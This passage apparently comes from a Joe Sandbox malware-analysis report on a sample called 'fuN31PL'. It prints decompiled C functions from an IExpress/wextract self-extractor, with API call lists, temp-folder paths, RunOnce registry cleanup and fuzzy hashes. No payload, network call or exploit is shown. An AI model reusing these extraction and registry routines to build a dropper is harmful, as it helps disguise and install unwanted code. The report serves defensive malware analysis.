                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE ref: 001A4033
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A4049
                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 001A405C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001A409C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001A40A8
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001A40DC
                                                                                                                                                                                                                                              • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001A40E9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3183975587-0
                                                                                                                                                                                                                                              • Opcode ID: e7ab30b03d7d87ffa4874d779370c5a8c6c31faa290acbadc6e045f89c8e5e95
                                                                                                                                                                                                                                              • Instruction ID: 22382e3cd73407e8a7329529df3ac5e0829ef24edd0a75cac8000bfa0fadd5ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7ab30b03d7d87ffa4874d779370c5a8c6c31faa290acbadc6e045f89c8e5e95
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF319C79640218BBEB209B65DC49FBB7778EBE6710F2001AAF605D25A1CBB05DC5CB21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A51E5(void* __eflags) {
                                                                                                                                                                                                                                              				int _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = E001A468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                                                                              					if(E001A468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                              						if(_t5 != 0) {
                                                                                                                                                                                                                                              							_t6 = E001A44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                              							LocalFree(_t28);
                                                                                                                                                                                                                                              							if(_t6 != 6) {
                                                                                                                                                                                                                                              								 *0x1a9124 = 0x800704c7;
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t28);
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree(_t28);
                                                                                                                                                                                                                                              					 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              				goto L10;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              0x001a51fb
                                                                                                                                                                                                                                              0x001a5207
                                                                                                                                                                                                                                              0x001a520b
                                                                                                                                                                                                                                              0x001a523c
                                                                                                                                                                                                                                              0x001a5268
                                                                                                                                                                                                                                              0x001a5270
                                                                                                                                                                                                                                              0x001a528b
                                                                                                                                                                                                                                              0x001a5293
                                                                                                                                                                                                                                              0x001a529c
                                                                                                                                                                                                                                              0x001a52a6
                                                                                                                                                                                                                                              0x001a52b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a52b0
                                                                                                                                                                                                                                              0x001a529e
                                                                                                                                                                                                                                              0x001a5279
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a527b
                                                                                                                                                                                                                                              0x001a5273
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5273
                                                                                                                                                                                                                                              0x001a524a
                                                                                                                                                                                                                                              0x001a5250
                                                                                                                                                                                                                                              0x001a5256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5256
                                                                                                                                                                                                                                              0x001a5219
                                                                                                                                                                                                                                              0x001a5223
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001A2F4D,?,00000002,00000000), ref: 001A5201
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001A5250
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                              • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                              • Opcode ID: 3e44bfc92b6d31ad8a76951bc86c68a8f3312fcbd3fbb790ad87b12502c65c58
                                                                                                                                                                                                                                              • Instruction ID: 489b70f33311d7de34fde18dd253f97f16957f6ea386dd74d12f7ebcad67d6dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e44bfc92b6d31ad8a76951bc86c68a8f3312fcbd3fbb790ad87b12502c65c58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F611EFBD304201BBE3256BB59D49B3B619EEFDB390F51402AF642E6590DBB88C418224
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                                              			E001A52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR** _t31;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 = __edi;
                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_t31 =  *0x1a91e0; // 0x2988e30
                                                                                                                                                                                                                                              				if(_t31 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t29 = _t31;
                                                                                                                                                                                                                                              						if( *0x1a8a24 == 0 &&  *0x1a9a30 == 0) {
                                                                                                                                                                                                                                              							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                              							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t31 = _t31[1];
                                                                                                                                                                                                                                              						LocalFree( *_t29);
                                                                                                                                                                                                                                              						LocalFree(_t29);
                                                                                                                                                                                                                                              					} while (_t31 != 0);
                                                                                                                                                                                                                                              					_pop(_t28);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 =  *0x1a8a20; // 0x0
                                                                                                                                                                                                                                              				_pop(_t32);
                                                                                                                                                                                                                                              				if(_t11 != 0 &&  *0x1a8a24 == 0 &&  *0x1a9a30 == 0) {
                                                                                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                                                                                              					E001A1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              					if(( *0x1a9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                              						E001A65E8( &_v268);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                              					_t22 =  &_v268;
                                                                                                                                                                                                                                              					E001A2390( &_v268);
                                                                                                                                                                                                                                              					_t11 =  *0x1a8a20; // 0x0
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *0x1a9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                              					_t11 = E001A1FE1(_t22); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *0x1a8a20 =  *0x1a8a20 & 0x00000000;
                                                                                                                                                                                                                                              				return E001A6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x001a52b6
                                                                                                                                                                                                                                              0x001a52b6
                                                                                                                                                                                                                                              0x001a52b6
                                                                                                                                                                                                                                              0x001a52c1
                                                                                                                                                                                                                                              0x001a52c8
                                                                                                                                                                                                                                              0x001a52cb
                                                                                                                                                                                                                                              0x001a52cc
                                                                                                                                                                                                                                              0x001a52d4
                                                                                                                                                                                                                                              0x001a52d6
                                                                                                                                                                                                                                              0x001a52d7
                                                                                                                                                                                                                                              0x001a52de
                                                                                                                                                                                                                                              0x001a52e0
                                                                                                                                                                                                                                              0x001a52f2
                                                                                                                                                                                                                                              0x001a52fa
                                                                                                                                                                                                                                              0x001a52fa
                                                                                                                                                                                                                                              0x001a5302
                                                                                                                                                                                                                                              0x001a5305
                                                                                                                                                                                                                                              0x001a530c
                                                                                                                                                                                                                                              0x001a5312
                                                                                                                                                                                                                                              0x001a5316
                                                                                                                                                                                                                                              0x001a5316
                                                                                                                                                                                                                                              0x001a5317
                                                                                                                                                                                                                                              0x001a531c
                                                                                                                                                                                                                                              0x001a531f
                                                                                                                                                                                                                                              0x001a5333
                                                                                                                                                                                                                                              0x001a5345
                                                                                                                                                                                                                                              0x001a5351
                                                                                                                                                                                                                                              0x001a5359
                                                                                                                                                                                                                                              0x001a5359
                                                                                                                                                                                                                                              0x001a5363
                                                                                                                                                                                                                                              0x001a5369
                                                                                                                                                                                                                                              0x001a536f
                                                                                                                                                                                                                                              0x001a5374
                                                                                                                                                                                                                                              0x001a5374
                                                                                                                                                                                                                                              0x001a5381
                                                                                                                                                                                                                                              0x001a5387
                                                                                                                                                                                                                                              0x001a5387
                                                                                                                                                                                                                                              0x001a538f
                                                                                                                                                                                                                                              0x001a53a0

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(02988E30,00000080,?,00000000), ref: 001A52F2
                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(02988E30), ref: 001A52FA
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(02988E30,?,00000000), ref: 001A5305
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(02988E30), ref: 001A530C
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(001A11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A5363
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A5334
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 2833751637-3647970563
                                                                                                                                                                                                                                              • Opcode ID: ff4a400de9e812c87840fb145becf072ee85ba89480a102cd2b4271a84acc1da
                                                                                                                                                                                                                                              • Instruction ID: f150ffa3d902a703824624dd64fad666e77f7948aad407c7b951167da5b8e2ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff4a400de9e812c87840fb145becf072ee85ba89480a102cd2b4271a84acc1da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F21AE39A04614DFDF219B24ED09B6977B5BF57790F44015AF842939A0DFB45CC4CB80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A1FE1(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				if( *0x1a8530 != 0) {
                                                                                                                                                                                                                                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                                                                                                              						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}





                                                                                                                                                                                                                                              0x001a1fee
                                                                                                                                                                                                                                              0x001a2005
                                                                                                                                                                                                                                              0x001a200d
                                                                                                                                                                                                                                              0x001a2017
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2020
                                                                                                                                                                                                                                              0x001a200d
                                                                                                                                                                                                                                              0x001a2029

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,001A538C,?,?,001A538C), ref: 001A2005
                                                                                                                                                                                                                                              • RegDeleteValueA.KERNELBASE(001A538C,wextract_cleanup1,?,?,001A538C), ref: 001A2017
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(001A538C,?,?,001A538C), ref: 001A2020
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                              • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                              • Opcode ID: c33db19dfdc34334716127bbf3e5d9ca0f1dc251837fdac16752a407defd9a87
                                                                                                                                                                                                                                              • Instruction ID: b6b22393c5b413bf38390cedc52f4cf38dcad578ad949ee839d60aaa22f5774c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c33db19dfdc34334716127bbf3e5d9ca0f1dc251837fdac16752a407defd9a87
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE08634D50318BBD7219F90EE0AF6A7B69FB03750F500194FE04A0460EB715E94D715
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				long _t35;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				struct HWND__* _t37;
                                                                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				long _t44;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				long _t46;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				long _t51;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                                                                              				char* _t63;
                                                                                                                                                                                                                                              				long _t64;
                                                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                                                                                              				int _t75;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                              				_v8 = _t30;
                                                                                                                                                                                                                                              				_t75 = _a8;
                                                                                                                                                                                                                                              				if( *0x1a91d8 == 0) {
                                                                                                                                                                                                                                              					_t32 = _a4;
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                                                                                                              						_t33 = E001A4E99(_t75);
                                                                                                                                                                                                                                              						L35:
                                                                                                                                                                                                                                              						return E001A6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t35 = _t32 - 1;
                                                                                                                                                                                                                                              					__eflags = _t35;
                                                                                                                                                                                                                                              					if(_t35 == 0) {
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						_t33 = 0;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t36 = _t35 - 1;
                                                                                                                                                                                                                                              					__eflags = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                                                                                                              						_t37 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t37;
                                                                                                                                                                                                                                              						if(_t37 != 0) {
                                                                                                                                                                                                                                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t54 = 0x1a91e4;
                                                                                                                                                                                                                                              						_t58 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t38 =  *_t58;
                                                                                                                                                                                                                                              							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                                                                                                              						} while (_t38 != 0);
                                                                                                                                                                                                                                              						_t59 = _t58 - 0x1a91e5;
                                                                                                                                                                                                                                              						__eflags = _t59;
                                                                                                                                                                                                                                              						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t39 =  *_t71;
                                                                                                                                                                                                                                              							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                              							__eflags = _t39;
                                                                                                                                                                                                                                              						} while (_t39 != 0);
                                                                                                                                                                                                                                              						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                              						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							L3:
                                                                                                                                                                                                                                              							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0x1a91e4;
                                                                                                                                                                                                                                              						_t30 = E001A4702( &_v268, 0x1a91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t41 = E001A476D( &_v268, __eflags);
                                                                                                                                                                                                                                              						__eflags = _t41;
                                                                                                                                                                                                                                              						if(_t41 == 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0x180);
                                                                                                                                                                                                                                              						_t30 = E001A4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                              						_t75 = _t30;
                                                                                                                                                                                                                                              						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                              						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E001A47E0( &_v268);
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x1a93f4 =  *0x1a93f4 + 1;
                                                                                                                                                                                                                                              						_t33 = _t75;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t44 = _t36 - 1;
                                                                                                                                                                                                                                              					__eflags = _t44;
                                                                                                                                                                                                                                              					if(_t44 == 0) {
                                                                                                                                                                                                                                              						_t54 = 0x1a91e4;
                                                                                                                                                                                                                                              						_t63 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t45 =  *_t63;
                                                                                                                                                                                                                                              							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                              							__eflags = _t45;
                                                                                                                                                                                                                                              						} while (_t45 != 0);
                                                                                                                                                                                                                                              						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t64 = _t63 - 0x1a91e5;
                                                                                                                                                                                                                                              						__eflags = _t64;
                                                                                                                                                                                                                                              						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t46 =  *_t74;
                                                                                                                                                                                                                                              							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                              							__eflags = _t46;
                                                                                                                                                                                                                                              						} while (_t46 != 0);
                                                                                                                                                                                                                                              						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                              						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0x1a91e4;
                                                                                                                                                                                                                                              						_t30 = E001A4702( &_v268, 0x1a91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                              						_t30 = E001A4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						E001A4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                              						__eflags = _t50;
                                                                                                                                                                                                                                              						if(_t50 != 0) {
                                                                                                                                                                                                                                              							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                              							__eflags = _t51;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t51 = 0x80;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t33 = 1;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t30 = _t44 - 1;
                                                                                                                                                                                                                                              					__eflags = _t30;
                                                                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
